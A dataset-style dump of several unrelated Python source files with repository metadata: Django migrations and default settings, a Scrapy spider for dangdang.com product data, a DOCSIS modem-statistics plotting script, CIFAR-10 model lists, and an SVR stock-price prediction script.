                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('status', models.ForeignKey(db_column='status', on_delete=django.db.models.deletion.DO_NOTHING, to='restapis.status')),
                ('user1', models.ForeignKey(db_column='user1', on_delete=django.db.models.deletion.DO_NOTHING, related_name='user1', to='restapis.user')),
                ('user2', models.ForeignKey(db_column='user2', on_delete=django.db.models.deletion.DO_NOTHING, related_name='user2', to='restapis.user')),
            ],
            options={
                'db_table': 'user_friend',
            },
        ),
        migrations.CreateModel(
            name='UserDomains',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('domain', models.ForeignKey(db_column='domain', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='restapis.domain')),
                ('user', models.ForeignKey(db_column='user', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='restapis.user')),
            ],
            options={
                'db_table': 'user_domains',
            },
        ),
    ]
| [
"rishav.ext@grofers.com"
] | rishav.ext@grofers.com |
1952920a40d28c432150bf5d0286ed71dac0c3a4 | f94d188a77beaa20ece14309af0e0eada54a951d | /atividades/atividade3/problema5.py | f22be687456af384d2a1ee167af2fe0002c6af08 | [] | no_license | gilsontm/ine5416-straights | ffc863a524b2c0adc33fa0aad618723132f1a5f8 | 9b5dd8e792f9d6d94a40a510be4482587b586a5f | refs/heads/master | 2023-01-29T12:11:30.348732 | 2020-12-07T14:10:17 | 2020-12-07T14:10:17 | 245,286,811 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | distance = lambda p1, p2: ((p1[0] - p2[0])**2 + (p1[1] - p2[1])**2 + (p1[2] - p2[2])**2)**(1/2)
# Read two 3-D points (six floats from stdin, in the same order as before)
# and print their Euclidean distance using the `distance` lambda above.
point_a = tuple(float(input()) for _ in range(3))
point_b = tuple(float(input()) for _ in range(3))
print(distance(point_a, point_b))
"gilson.t.magro@gmail.com"
] | gilson.t.magro@gmail.com |
0028e769f48535dbe6482837048edd7a6508f7c6 | e2a5326adbff91c73a18c9f3838fb8130f15d8d4 | /CurrentSensorPython/venv/Scripts/futurize-script.py | 5418b2d2a91c813ebecda9b1b7ff1421ce766f65 | [
"MIT"
] | permissive | IonicRob/CurrentSensor | f68baa6b8a35f965df2cfa8a10d41d84d8893022 | eb2ac041d6d658f953c4cc5c162b3a6284c5072c | refs/heads/main | 2023-04-05T02:17:23.596978 | 2021-04-30T12:44:11 | 2021-04-30T12:44:11 | 350,689,076 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,012 | py | #!C:\Users\rober\Documents\CurrentSensorPython\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'future==0.18.2','console_scripts','futurize'
# Auto-generated setuptools console-script wrapper for the `futurize` tool.
import re
import sys
# for compatibility with easy_install; see #2198
__requires__ = 'future==0.18.2'
# Resolve an entry-point loader: prefer stdlib importlib.metadata, then the
# importlib_metadata backport, and fall back to pkg_resources.
try:
    from importlib.metadata import distribution
except ImportError:
    try:
        from importlib_metadata import distribution
    except ImportError:
        from pkg_resources import load_entry_point
def importlib_load_entry_point(spec, group, name):
    # Look up the named entry point in the distribution and import it.
    dist_name, _, _ = spec.partition('==')
    matches = (
        entry_point
        for entry_point in distribution(dist_name).entry_points
        if entry_point.group == group and entry_point.name == name
    )
    return next(matches).load()
# Only install the importlib-based loader when pkg_resources did not
# already provide load_entry_point above.
globals().setdefault('load_entry_point', importlib_load_entry_point)
if __name__ == '__main__':
    # Normalise argv[0] (strip "-script.py(w)"/".exe") and run the tool.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(load_entry_point('future==0.18.2', 'console_scripts', 'futurize')())
| [
"62338052+IonicRob@users.noreply.github.com"
] | 62338052+IonicRob@users.noreply.github.com |
7415bb9a1f738056868a9b8777d22718af7dfdab | d4e83b0853f303b165341c9530d0cdaead494298 | /dangdang/dd/dd/spiders/dd_spider.py | 88967f7690303f3ebc8c7062be9eb2287522cc8d | [] | no_license | tianjinqiujie/scrapy_dd | 3db20e55035fd340f6f8ab8a2b883f2de95faefd | ccb7c8bd20254d7aa39f9e82c84e5c4f7b0a2395 | refs/heads/master | 2020-04-08T16:16:29.790651 | 2018-12-10T14:04:07 | 2018-12-10T14:04:07 | 159,511,887 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,706 | py | # -*- coding: utf-8 -*-
import scrapy
import requests
import time
from dd.items import DDItem
from bs4 import BeautifulSoup
from scrapy.linkextractors import LinkExtractor
# Browser-like request headers sent with every category request.
# NOTE(review): the "Accept" and "User-Agent" values contain a literal '…'
# — they look truncated when copied from browser dev-tools, so the server
# receives malformed values; restore the full strings before relying on them.
headers = {
    "Accept": "text/html,application/xhtml+xm…plication/xml;q=0.9,*/*;q=0.8",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en;q=0.3,en-US;q=0.2",
    "Cache-Control": "no-cache",
    "Connection": "keep-alive",
    "Host": "category.dangdang.com",
    "Pragma": "no-cache",
    "Referer": "http://www.dangdang.com/",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; …) Gecko/20100101 Firefox/63.0"
}
class DdSpiderSpider(scrapy.Spider):
    """Scrapy spider that crawls dangdang.com book categories, follows
    pagination, and yields one DDItem per product detail page."""
    name = 'dd_spider'
    allowed_domains = ['dangdang.com']
    start_urls = ['http://category.dangdang.com/?ref=www-0-C/']
    def parse(self, response):
        """Follow every book-category link from the category index page."""
        href = response.css(".classify_books > div > ul > li > a::attr(href)").extract()
        for url in href:
            yield scrapy.Request(url, headers=headers, callback=self.get_next_page)
    def get_next_page(self, response):
        """Derive the page count from the last pagination link and request
        every listing page of the category.

        NOTE(review): the IndexError fallback assigns a *list* to `links`,
        so `links.text` then raises AttributeError, which the bare `pass`
        below swallows — i.e. categories with no pagination links are
        silently skipped; confirm this is intentional.
        """
        pattern = "http://category\.dangdang\.com/pg.*"
        le = LinkExtractor(allow=pattern)
        try:
            links = le.extract_links(response)[-1]
        except IndexError as e:
            links = le.extract_links(response)
        # Last URL path segment, e.g. "cp01.54.06.00.00.00.html";
        # passed along in meta for the per-product comment API call.
        url_pop = response.url.split("/").pop(-1)
        msg = {"url_pop": url_pop}
        try:
            # links.text is the number shown on the last pagination link.
            for i in range(1, int(links.text) + 1):
                url = "http://category.dangdang.com/pg%s-%s" % (i, url_pop)
                yield scrapy.Request(url, meta=msg, callback=self.get_shops_list)
        except ValueError as e:
            # Non-numeric link text: fall back to crawling just this page.
            yield scrapy.Request(response.url, meta=msg, callback=self.get_shops_list)
        except AttributeError as e:
            pass
    def get_shops_list(self, response):
        """Request the detail page of every product on a listing page."""
        msg = response.meta
        url = response.css(".bigimg> li > p > a:nth-child(1)::attr(href)").extract()
        for i in url:
            yield scrapy.Request(i, meta=msg, callback=self.get_shop_info)
    def get_total_score(self, response):
        """Debug helper: dump a response body (not wired up as a callback)."""
        print(response.text)
    def get_shop_info(self, response):
        """Scrape one product page and yield a populated DDItem."""
        # Category path for the comment API, derived from the listing URL.
        # NOTE(review): lstrip/rstrip strip *character sets*, not literal
        # prefixes/suffixes — verify ids never start/end with those chars.
        msg = response.meta.get("url_pop").lstrip("cp").rstrip(".html")
        price = response.xpath("//div[@class='price_d']/p[@id='dd-price']").extract_first()
        if not price:
            price = response.xpath("//div[@class='cost_box']/p[1]/span[@class='normal_price']/i/text()").extract_first()
        # NOTE(review): "html" is an unusual BeautifulSoup parser name
        # (usually "html.parser") — confirm it resolves on this install.
        price_soup = BeautifulSoup(price, "html")
        if not price_soup:
            return
        ########################################### extract the required fields ###########################################
        # Price (a "12.3-45.6" range falls back to its lower bound)
        goods_price = price_soup.text.strip('\n').strip("\r").strip(" ").lstrip("¥")
        try:
            goods_price = float(goods_price)
        except ValueError as e:
            goods_price = float(goods_price.split("-")[0])
        # Product name
        goods_name = response.xpath("/html/body/div[2]/div[3]/div[2]/div/div[1]/div[1]/h1/@title").extract_first()
        if not goods_name:
            goods_name = str(response.css(".name_info > h1:nth-child(1)").extract_first())
        goods_name_soup = BeautifulSoup(goods_name)
        goods_name = goods_name_soup.text.replace("\r","").strip(" ").replace("\n","").strip(" ").replace(" ","")
        # Product detail URL
        goods_detail_url = response.url
        # Image URL
        goods_image = response.css("#main-img-slider > li > a > img::attr(src)").extract_first()
        # Product ID (numeric part of the detail-page URL)
        goods_product_id = int(response.url.split("/")[-1].split(".")[-2])
        # Category name
        goods_cate_name = response.css("a.green:nth-child(1)::text").extract_first()
        # Comment count (also reused below as the sales figure)
        goods_comment_num = response.css("#comm_num_down::text").extract_first()
        # Shop name (default string means "Dangdang self-operated")
        shop_name = response.css(".title_name > span:nth-child(2) > a:nth-child(1)::text").extract_first()
        if not shop_name:
            shop_name = "当当自营"
        # Rating, fetched from the comment-list JSON API
        url = 'http://product.dangdang.com/index.php?r=comment%2Flist&productId={}&categoryPath={}' \
              '&mainProductId={}&mediumId=0&pageIndex=1&sortType=1&filterType=1&isSystem=1&tagId=0&' \
              'tagFilterCount=0'.format(goods_product_id, msg, goods_product_id)
        # NOTE(review): time.sleep and a synchronous requests.Session call
        # both block Scrapy's event loop and bypass its scheduler/throttling;
        # a chained scrapy.Request would be the idiomatic approach.
        time.sleep(0.1)
        # ret = scrapy.Request(url,callback=self.get_total_score)
        s = requests.Session()
        # goodRate is a 0-100 percentage; /20 maps it onto a 5-star scale.
        goods_total_score = float(s.get(url).json().get('data').get("list").get('summary').get('goodRate')) / 20
        dd = DDItem()
        # `info` duplicates the item fields; only used by the commented-out
        # debug print at the bottom.
        info = {
            "goods_price": goods_price,
            "goods_name": goods_name,
            "goods_detail_url": goods_detail_url,
            "goods_image": goods_image,
            "goods_product_id": goods_product_id,
            "goods_cate_name": goods_cate_name,
            "goods_comment_num": goods_comment_num,
            "goods_sale_num": goods_comment_num,
            "shop_name": shop_name,
            "goods_total_score": goods_total_score,
            "platform": 9
        }
        dd["goods_price"] = goods_price
        dd["goods_name"] = goods_name
        dd["goods_detail_url"] = goods_detail_url
        dd["goods_image"] = goods_image
        dd["goods_product_id"] = goods_product_id
        dd["goods_cate_name"] = goods_cate_name
        dd["goods_comment_num"] = goods_comment_num
        dd["goods_sale_num"] = goods_comment_num
        dd["shop_name"] = shop_name
        dd["goods_total_score"] = goods_total_score
        dd["platform"] = 9
        yield dd
        # print("----->", info)
| [
"qiujie2010@qq.com"
] | qiujie2010@qq.com |
24ed6d4aae7221b002cc5c5d50b2cdd9637d1ed9 | f9a4decff92a56b5296ac88e249c611d1d4102c7 | /dogler_plot3.py | f39ccef6669029ab504fb8fcbbfdc3a18b806271 | [] | no_license | edmonds/dogler | 1ef8d3a1a3f44c814289c357ce7950075b8628e9 | ac2fbb9d6c664e170a173bc79cc9c71a254da420 | refs/heads/master | 2021-08-30T03:54:24.032899 | 2017-12-15T23:27:26 | 2017-12-15T23:27:26 | 114,419,192 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,464 | py | #!/usr/bin/env python
from collections import OrderedDict
import datetime
import json
import math
import sys
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from matplotlib.ticker import MultipleLocator
def _pad_and_append(series, value, expected_len):
    """Append `value` to `series`, first zero-filling any gap so the series
    stays aligned with the shared timestamp axis.

    Returns the number of padding zeros inserted (0 when the channel was
    present in every earlier sample).
    """
    missing = expected_len - len(series)
    if missing:
        series.extend([0] * missing)
    series.append(value)
    return missing


def _plot_channels(fignum, title, xs, data, field, ylabel, ymin, ymax,
                   outname, alpha, linewidth=None, ncol=None):
    """Draw one figure with a line per channel from data[ch][field] and save
    it via plt.savefig(outname, dpi=300)."""
    plt.figure(fignum)
    plt.title(title)
    ax = plt.gca()
    ax.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d %H:%M'))
    # Matplotlib date units are days: 60/1440 = one hour, 30/1440 = 30 min.
    ax.xaxis.set_major_locator(MultipleLocator(60/1440.0))
    ax.xaxis.set_minor_locator(MultipleLocator(30/1440.0))
    ax.yaxis.set_major_locator(MultipleLocator(1.0))
    ax.yaxis.set_minor_locator(MultipleLocator(0.2))
    for ch in data:
        extra = {} if linewidth is None else {'linewidth': linewidth}
        plt.plot(xs, data[ch][field], label=str(ch), alpha=alpha, **extra)
    plt.xticks(rotation=85, fontsize=4)
    plt.grid(True, which='major', linewidth=1)
    plt.grid(True, which='minor', linewidth=0.5, linestyle='dotted')
    plt.ylim(math.floor(ymin) - 2, math.ceil(ymax) + 1)
    plt.ylabel(ylabel)
    plt.xlabel('Time')
    legend_extra = {} if ncol is None else {'ncol': ncol}
    ax.legend(loc='lower left', fontsize='xx-small', **legend_extra)
    plt.tight_layout()
    plt.savefig(outname, dpi=300)


def main(fnames):
    """Read JSON-lines modem-stats capture files and write five PNG plots of
    per-channel DOCSIS 3.0/3.1 downstream power & SNR and upstream power.

    Each input line is one JSON record with a `unixTime` plus `dsTable`,
    `d31dsTable` and `usTable` channel tables.
    """
    timestamps = []
    dsData = OrderedDict()    # DOCSIS 3.0 downstream: ch -> {'power': [...], 'snr': [...]}
    ds31Data = OrderedDict()  # DOCSIS 3.1 downstream, same layout
    usData = OrderedDict()    # upstream: ch -> {'power': [...]}

    # Running y-axis bounds; only samples from rows with no padding count,
    # so a channel that just (re)appeared cannot skew the axis limits.
    minDsPower, maxDsPower = 10000.0, -10000.0
    minDs31Power, maxDs31Power = 10000.0, -10000.0
    minDsSNR, maxDsSNR = 10000.0, -10000.0
    minDs31SNR, maxDs31SNR = 10000.0, -10000.0
    minUsPower, maxUsPower = 10000.0, -10000.0

    for fname in fnames:
        for line in open(fname):
            j = json.loads(line)
            unixTime = int(j['unixTime'])
            timestamps.append(datetime.datetime.fromtimestamp(unixTime))
            # Number of samples every series should already have had.
            expected = len(timestamps) - 1

            for ds in j['dsTable']:
                ch = ds['Channel ID']
                if ch == '0':
                    continue
                if ch not in dsData:
                    dsData[ch] = {'power': [], 'snr': []}
                # Values look like "3.5 dBmV"; keep the numeric prefix.
                power = float(ds['Power'].partition(' ')[0])
                snr = float(ds['SNR / MER'].partition(' ')[0])
                padded = _pad_and_append(dsData[ch]['power'], power, expected)
                padded += _pad_and_append(dsData[ch]['snr'], snr, expected)
                if padded:
                    continue
                minDsPower = min(minDsPower, power)
                maxDsPower = max(maxDsPower, power)
                minDsSNR = min(minDsSNR, snr)
                maxDsSNR = max(maxDsSNR, snr)

            for ds in j['d31dsTable']:
                ch = ds['Channel ID']
                if ch == '0':
                    continue
                if ch not in ds31Data:
                    ds31Data[ch] = {'power': [], 'snr': []}
                power = float(ds['Power'].partition(' ')[0])
                snr = float(ds['SNR / MER'].partition(' ')[0])
                padded = _pad_and_append(ds31Data[ch]['power'], power, expected)
                padded += _pad_and_append(ds31Data[ch]['snr'], snr, expected)
                if padded:
                    continue
                minDs31Power = min(minDs31Power, power)
                maxDs31Power = max(maxDs31Power, power)
                minDs31SNR = min(minDs31SNR, snr)
                maxDs31SNR = max(maxDs31SNR, snr)

            for us in j['usTable']:
                ch = us['Channel ID']
                if ch == '0':
                    continue
                if ch not in usData:
                    usData[ch] = {'power': []}
                power = float(us['Power'].partition(' ')[0])
                # BUG FIX: the original reused `num_missing` left over from
                # the downstream loops here (it was never initialised in this
                # loop), so upstream min/max updates could be skipped on a
                # stale value, or raise NameError. Pad state is now per-row.
                if _pad_and_append(usData[ch]['power'], power, expected):
                    continue
                minUsPower = min(minUsPower, power)
                maxUsPower = max(maxUsPower, power)

    timestamps = mdates.date2num(timestamps)

    _plot_channels(1, 'DOCSIS 3.0 downstream power', timestamps, dsData,
                   'power', 'Power (dBmV)', minDsPower, maxDsPower,
                   'dsPower', alpha=0.7, ncol=4)
    _plot_channels(2, 'DOCSIS 3.0 downstream SNR', timestamps, dsData,
                   'snr', 'SNR (dB)', minDsSNR, maxDsSNR,
                   'dsSNR', alpha=0.5, ncol=4)
    _plot_channels(3, 'DOCSIS 3.0 upstream power', timestamps, usData,
                   'power', 'Power (dBmV)', minUsPower, maxUsPower,
                   'usPower', alpha=0.7, linewidth=2)
    _plot_channels(4, 'DOCSIS 3.1 downstream power', timestamps, ds31Data,
                   'power', 'Power (dBmV)', minDs31Power, maxDs31Power,
                   'ds31Power', alpha=0.7, ncol=4)
    _plot_channels(5, 'DOCSIS 3.1 downstream SNR', timestamps, ds31Data,
                   'snr', 'SNR (dB)', minDs31SNR, maxDs31SNR,
                   'ds31SNR', alpha=0.5, ncol=4)
if __name__ == '__main__':
    # CLI entry point: plot every capture file named on the command line,
    # processed in sorted (i.e. chronological filename) order.
    main(sorted(sys.argv[1:]))
| [
"edmonds@users.noreply.github.com"
] | edmonds@users.noreply.github.com |
651fc6d07593ca2c0031b84b6e7908d0418931c4 | ad20f980594bacea11eababc361ef2525b32d202 | /LearningPython/MatPlot Tests/Turtle.py | d8a8a64c8db1530abbd30d06a6ca12016298424a | [] | no_license | hashnet/PythonProjects | 4576852df3983f89e8f668a933ea73a943501aa4 | 5dd43ea2a2fd4d493fcb89121477a9495819e2ad | refs/heads/master | 2021-06-18T06:22:04.100976 | 2021-02-09T15:14:31 | 2021-02-09T15:14:31 | 168,465,818 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | import turtle
import numpy as np
# Frequency ratio between the y and x cosine arguments below (a
# Lissajous-style curve drawn as an inward spiral).
# NOTE(review): on Python 2 these literals are integer divisions
# (15/20 == 0); the script presumably targets Python 3 -- confirm.
ratio = 15/20
# ratio = 1/2
# ratio = 2/1
# ratio = 3/2
# ratio = 1/1
# ratio = 5/4
turtle.speed(0)  # fastest drawing speed (no animation delay)
turtle.bgcolor('black')
turtle.pencolor('white')
turtle.pensize(3)
turtle.penup()  # travel to the first point without drawing
cx = 0           # phase of the x cosine
cy = np.pi/2     # phase of the y cosine (starts a quarter turn ahead)
dx = 0.06        # x phase increment per step
dy = dx * ratio  # y phase advances `ratio` times as fast
m = 200          # current amplitude; shrinks every step (spiral inward)
dm = 0.08        # amplitude decay per step
while True:
    x = np.cos(cx) * m
    y = np.cos(cy) * m
    turtle.goto(x, y)
    cx += dx
    cy += dy
    m -= dm
    turtle.pendown()  # pen drops after the first move, so drawing starts then
    if m < dm:
        break
turtle.done() | [
"maidul.hasan@gmail.com"
] | maidul.hasan@gmail.com |
3992e4cfa297274e2d85355c42f979d6de7326c2 | f52997ac7e1b41f34018c3a0028ced8638072b2b | /src/peoplefinder/migrations/0090_data_person_new_country.py | 1745636c4926fcb0b87247bd92c8f80294e57bf4 | [
"MIT"
] | permissive | uktrade/digital-workspace-v2 | 49fae1fca819b625c6f6949fb5ce51b89fbcab96 | 7e328d0d55c9aa73be61f476823a743d96e792d0 | refs/heads/main | 2023-09-03T12:03:47.016608 | 2023-09-01T12:07:55 | 2023-09-01T12:07:55 | 232,302,840 | 6 | 0 | MIT | 2023-09-13T15:50:24 | 2020-01-07T10:41:18 | Python | UTF-8 | Python | false | false | 820 | py | # Generated by Django 3.2.13 on 2022-05-23 13:15
from django.db import migrations
def insert_person_new_country(apps, schema_editor):
    """Data migration: copy each Person's legacy ``country`` relation into
    the new ``new_country`` foreign key, matching Country rows by ISO-2 code.
    """
    Person = apps.get_model("peoplefinder", "Person")
    Country = apps.get_model("countries", "Country")
    all_people = Person.objects.select_related("country").all()
    # Map ISO-2 code -> Country instance so the loop does O(1) lookups
    # instead of one query per person.
    country_lookup = Country.objects.all().in_bulk(field_name="iso_2_code")
    people_to_update = []
    for person in all_people:
        # NOTE(review): raises KeyError if a person's country code has no
        # matching Country row -- presumably guaranteed upstream; confirm.
        person.new_country = country_lookup[person.country.code]
        people_to_update.append(person)
    Person.objects.bulk_update(people_to_update, ["new_country"], batch_size=100)
class Migration(migrations.Migration):
    # Requires the schema migration that added Person.new_country.
    dependencies = [
        ("peoplefinder", "0089_person_new_country"),
    ]
    # Forward-only data copy; no reverse function is supplied.
    operations = [migrations.RunPython(insert_person_new_country)]
| [
"noreply@github.com"
] | uktrade.noreply@github.com |
6e6a39acc5558ad61c60d5fb89c785410abfbaeb | 7ed3fcc54ad72df9f6106cb5fc3bfb0021c0f548 | /src/modules/utils.py | 0f77a16ef299715d7c425fed3cf13118994d4cc8 | [] | no_license | jimpei8989/SPML-HW1 | 5fb3c9acdb0ccdce47783b182f1ad34616fb784c | 7d0fdcce65ba360b453d057037a6fd66d327cabd | refs/heads/master | 2023-01-06T15:17:58.287394 | 2020-11-06T02:51:58 | 2020-11-06T02:51:58 | 298,754,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,481 | py | from pytorchcv.model_provider import _models
# Every CIFAR-10 model name registered in pytorchcv's model zoo.
all_pytorchcv_cifar10_models = [k for k in _models if k.endswith('cifar10')]
# CIFAR-10 class names, in label-index order.
all_labels = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
# Models used as proxies when crafting adversarial examples.
proxy_models = list(map(lambda s: s + '_cifar10', [
    'nin',
    'resnet20',
    'preresnet20',
    'resnext29_32x4d',
    'seresnet20',
    'densenet40_k12',
    'ror3_56',
    'shakeshakeresnet20_2x16d',
]))
# Evaluation model sets, keyed by experiment name.
eval_models = {
    'small': list(map(lambda s: s + '_cifar10', [
        'resnet20',
        'sepreresnet20',
        'densenet40_k12',
        'nin',
        'resnext29_32x4d',
        'pyramidnet110_a48',
    ])),
    'proxy_exp': list(map(lambda s: s + '_cifar10', [
        'resnet20',
        'resnet1001',
        'sepreresnet20',
        'sepreresnet542bn',
        'densenet40_k12',
        'densenet100_k24',
        'pyramidnet110_a48',
    ])),
    'large': list(map(lambda s: s + '_cifar10', [
        'nin',
        'resnet20',
        'resnet1001',
        'resnet164bn',
        'preresnet20',
        'resnext29_32x4d',
        'seresnet20',
        'pyramidnet110_a48',
        'densenet40_k12',
        'xdensenet40_2_k24_bc',
        'ror3_56',
        'shakeshakeresnet20_2x16d',
        'diaresnet20',
    ])),
    'final': list(map(lambda s: s + '_cifar10', [
        'nin',
        'sepreresnet56',
        'resnet1001',
        'xdensenet40_2_k24_bc',
        'ror3_110',
    ]))
}
# proxy_models = [
# 'resnet110_cifar10', # Top1Err: 3.69 / Params: 1.7M / FLOPs: 255M
# 'preresnet272bn_cifar10', # Top1Err: 3.25 / Params: 2.8M / FLOPs: 420M
# 'resnext29_32x4d_cifar10', # Top1Err: 3.15 / Params: 4.7M / FLOPs: 780M
# 'pyramidnet110_a48_cifar10', # Top1Err: 3.72 / Params: 1.7M / FLOPs: 408M
# 'densenet40_k36_bc_cifar10', # Top1Err: 4.04 / Params: 1.5M / FLOPs: 654M
# ]
# eval_models = [
# 'resnet110_cifar10', # Top1Err: 3.69 / Params: 1.7M / FLOPs: 255M
# 'resnet272bn_cifar10',
# 'preresnet272bn_cifar10', # Top1Err: 3.25 / Params: 2.8M / FLOPs: 420M
# 'resnext29_32x4d_cifar10', # Top1Err: 3.15 / Params: 4.7M / FLOPs: 780M
# 'seresnet272bn_cifar10',
# 'pyramidnet110_a48_cifar10', # Top1Err: 3.72 / Params: 1.7M / FLOPs: 408M
# 'densenet40_k36_bc_cifar10', # Top1Err: 4.04 / Params: 1.5M / FLOPs: 654M
# 'wrn16_10_cifar10',
# 'ror3_164_cifar10',
# 'shakeshakeresnet26_2x32d_cifar10',
# ]
| [
"jimpei8989@gmail.com"
] | jimpei8989@gmail.com |
89fa7db714dcbc3e06cc865abc3954b4cfe64ba0 | 37630a079d08e6b4b605235c20252fc5efb53f06 | /udyam/settings.py | bda0a33e12dcf28c53958bdc7072e7217fe4fe89 | [] | no_license | Suhani97/test-project | f36aa39c5a5cf9cb74c308f0bd841ab732b46dea | 791babeba2f39e27cc079e8aa8aedd40e719c300 | refs/heads/main | 2023-08-24T13:58:34.345641 | 2021-10-02T07:25:44 | 2021-10-02T07:25:44 | 412,722,581 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,361 | py | """
Django settings for udyam project.
Generated by 'django-admin startproject' using Django 3.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): hard-coded key checked into source; load from an
# environment variable before any production deployment.
SECRET_KEY = 'django-insecure-v-y73s=j+a&bb!f+d34bik90#a6+rm3v)-yewy%ex8=@%3d$#5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty list is fine while DEBUG=True; must list real hosts in production.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'udyam.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'udyam.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
# Development default: single-file SQLite database in the project root.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"noreply@github.com"
] | Suhani97.noreply@github.com |
0a1c1041724b7f4ef0353165683fefd5d16a4d0b | ad76a88383d90abeedd65f2628def0d51b4e3701 | /core/prediction/test.py | e44923fadf8b185054c58ac74330055b17077000 | [
"Apache-2.0"
] | permissive | Karagul/Market | 6eaf6fddaa6fa369ea85deb21b1554f8ffd0e55e | 62f7d7eae58ec81b3cfc6d12350a73f01a559463 | refs/heads/master | 2020-06-11T06:12:39.148599 | 2017-01-22T13:09:39 | 2017-01-22T13:09:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,207 | py | from core.database import stockdata
from sklearn.svm import SVR
from sklearn import preprocessing, grid_search
from sklearn.metrics import mean_squared_error, mean_absolute_error, median_absolute_error
import numpy as np
import matplotlib.pyplot as plt
import pickle
import sys
#sys.exit('This is too good to change. Don\'t run this.')
# Back-test script: load a previously grid-searched SVR for one stock
# symbol, predict next-day opening prices on a held-out window, report
# error metrics and plot actual vs predicted.
symbol = 'ITC'
# Get the data
link = stockdata.StockData()
splitDate = link.get_split_date(symbol)
# Start at the last stock split (if any) so prices are on one scale.
startDate = splitDate if splitDate else '2015-01-01'
link.sfrom(startDate)
link.sto('2016-05-09')
allResults = link.get_sdata(symbol)
# Split into train and testing data
testSplit = 150
# NOTE(review): first 150 rows train, last 150 rows test -- these windows
# overlap whenever len(allResults) < 300; confirm the data span.
result = allResults[:testSplit]
test = allResults[-testSplit:]
# Extract required features and output values
features = result[:-1] # Features will be 0 to n-1
predictions = result[1:] # Outputs will be 1 to n
predictions = [row[0] for row in predictions] # Predict open and close values
# Transform into numpy arrays
# NOTE(review): both assignments below are dead -- X and y are overwritten
# by the scaler fit_transform calls a few lines down.
X = np.array(features)
y = np.array(predictions)
# Pre-processing, transform to range [-1,1]
minMaxFeatures = preprocessing.MinMaxScaler((-1, 1))
minMaxPred = preprocessing.MinMaxScaler((-1, 1))
X = minMaxFeatures.fit_transform(features)
y = minMaxPred.fit_transform(predictions)
# Find the best parameters
# svr = SVR()
# parameters = {'C': [1, 10, 100, 1000], 'gamma': [0.001, 0.1, 1]}
# clf = grid_search.GridSearchCV(svr, parameters)
# clf.fit(X, y)
res_dict = dict()
# Load the previously saved grid-search result for this symbol.
# NOTE(review): pickle.load on an on-disk file -- safe only if the file is
# trusted (pickle can execute arbitrary code).
with open('./../../upinkai/company_clf/'+symbol, 'rb') as file:
    res_dict=pickle.load(file)
# Predict
# Re-fit a fresh SVR with the stored best C/gamma hyper-parameters.
svr = SVR(C=res_dict['svr'].get_params()['C'], gamma=res_dict['svr'].get_params()['gamma'])
svr.fit(X, y)
